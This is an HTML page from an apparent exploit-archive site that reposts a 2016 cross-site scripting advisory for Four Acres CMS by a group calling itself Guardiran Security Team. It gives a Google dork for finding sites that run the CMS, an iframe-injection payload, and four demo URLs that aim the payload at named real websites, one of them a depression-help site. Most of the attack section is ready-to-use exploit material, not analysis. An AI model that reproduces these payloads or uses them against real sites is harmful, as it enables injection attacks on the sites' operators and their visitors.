<html>
    <head>
        <link rel="shortcut icon" href="https://mr-msa.xyz/IMG/icon.png" type="image/x-icon">
        <style>
            html
            {
                background-color:black;
            }
            pre
            {
                color:green;
                font-size:11pt;
            }
            a
            {
                text-decoration:none;
            }
            button
            {
                background-color:green;
                width:200px;
                height:40px;
                color:#FFF;
                border:1px solid #999;
                border-radius:4px;
                
            }
            .back
            {
                width:60px;
            }
        </style>
        <title>exploit-33</title>
    </head>
    <body>
        <center>
                <a  href="exploit-33" download>
                    <button>
                    Download
                    </button>
                </a>
                <a href="../database">
                    <button class="back">
                    Back
                    </button>
                </a>
        </center>
        <pre>

###########################


# Four Acres CMS Cross Site Scripting Vulnerability


###########################


###########################


# Four Acres CMS Cross Site Scripting Vulnerability


###########################


* Title : Four Acres CMS Cross Site Scripting Vulnerability

* date : 15/06/2016

* Google Dork : intext:\&quot;Website Design &amp; Development Four Acres Limited\&quot;

* Exploit Author : Guardiran Security Team

* Website : guardiran.org

* Vendor HomePage :http://www.four-acres.com/

* Version : All Version

* Tested On : Kali Linux w3af / Windows 8.1 Mozila FireFox


Hello Guys.

This Is A Xss Vulnerability.

This CMS And Also Have Xss Vulnerability.

We Cnd Run Our Javacode In site.

Payload: \'&gt;&lt;iframe src=\\&quot;http://guardiran.org/forums\\&quot; width=\\&quot;450\\&quot; height=\\&quot;200\\&quot;&gt;&lt;/iframe&gt;

Demo :

http://www.aaaucklandhypnotherapy.com/'%3E%3Ciframe%20src=/%22http://guardiran.org/forums/%22%20width=/%22450/%22%20height=/%22200/%22%3E%3C/iframe%3E
http://jamaicanmehungry.need.co.nz/'%3E%3Ciframe%20src=/%22http://guardiran.org/forums/%22%20width=/%22450/%22%20height=/%22200/%22%3E%3C/iframe%3E
http://depressionhelp.org/'%3E%3Ciframe%20src=/%22http://guardiran.org/forums/%22%20width=/%22450/%22%20height=/%22200/%22%3E%3C/iframe%3E
http://hypnotherapy-hypnosis.need.co.nz/'%3E%3Ciframe%20src=/%22http://guardiran.org/forums/%22%20width=/%22450/%22%20height=/%22200/%22%3E%3C/iframe%3E



* Special Tnx : cod3!nj3ct!0n , REX , alizombie , DR.GrYgHoN , MR.IMAN , 1TED,javon-nakam

* Discovered By : Reza.attacker ~~ alone_attacker@yahoo.com ~~ telegram.me/anonymous_reza

* We Are Guardiran Security Team        </pre>
    </body>
</html>